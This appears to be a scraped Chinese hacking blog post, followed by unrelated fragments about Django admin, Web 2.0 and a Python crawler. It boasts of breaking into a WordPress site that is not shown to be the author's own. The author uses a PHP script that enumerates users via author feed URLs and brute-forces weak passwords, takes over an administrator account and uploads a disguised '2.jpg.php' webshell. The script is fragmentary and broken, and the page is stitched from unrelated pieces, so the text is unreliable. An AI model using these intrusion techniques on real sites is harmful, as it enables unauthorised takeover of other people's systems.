看到乙個站點,(此處忽略一萬字)先爬蟲一下。
使用這個工具
發現乙個info目錄很可疑,開啟以後憑藉我多年的日站經驗、敏銳的觀察力、超強的分析力; 斷定這是wordpress
此部落格程式沒有什麼好的漏洞,好用的xss又需要管理員互動
於是使用以下指令碼:
set_time_limit(0);
$domain = $ar**[1];
//獲取使用者名稱
for ($i=1; $i <= 10; $i++)
$pattern = "/author\/(.*)\/feed/";
preg_match($pattern, $response, $name);
$namearray = $name[1];}
echo "共獲取使用者".count($namearray)."名使用者\n";
echo "正在破解使用者名稱與密碼相同的使用者:\n";
$crackname = crackpassword($namearray,"same");
$passwords = file("pass.txt");
echo "正在破解弱口令使用者:\n";
}?>直接獲取到使用者並且嘗試使用者名稱與密碼相同的使用者
漂亮,賬戶管理員許可權。
你以為就這樣結束了嗎?
呵呵噠,全站不可寫
接下來發現了這個,打鉤----上傳
2.jpg.php是webshell
getshell的目的達到了。
Django7 站點管理
from django.contrib import admin register your models here.使用者管理 class useradmin admin.modeladmin 顯示字段 list display pk username password 蒐做字段 search f...
web2 0站點的湧現現象
web2.0催生了許多新鮮有趣的事物,也強化了一些傳統的概念。接觸2.0雖不久,但卻已碰到了不少古怪有趣的詞,其中不少堪為經典,並且似乎這種現象還會繼續衍生。最初難倒我的乙個詞是meme meme中文翻譯為 擬子 覓母 於生物學中的基因。在社會學中,它代表的是社會基因,也就是各種具有遺傳 複製和傳播...
Python爬蟲實現(免登陸站點)
說明 此爬蟲應用場景 主要針對一些免登陸的 實現的 一 示例 1 以下示例是爬取乙個 多頁 內容的結果,可以登陸其 觀察爬蟲多頁資訊 2 試驗中經常出現返回結果是resultset find findall 的問題,仿照此例 為模板可以提供一種解決方法 import re import urllib...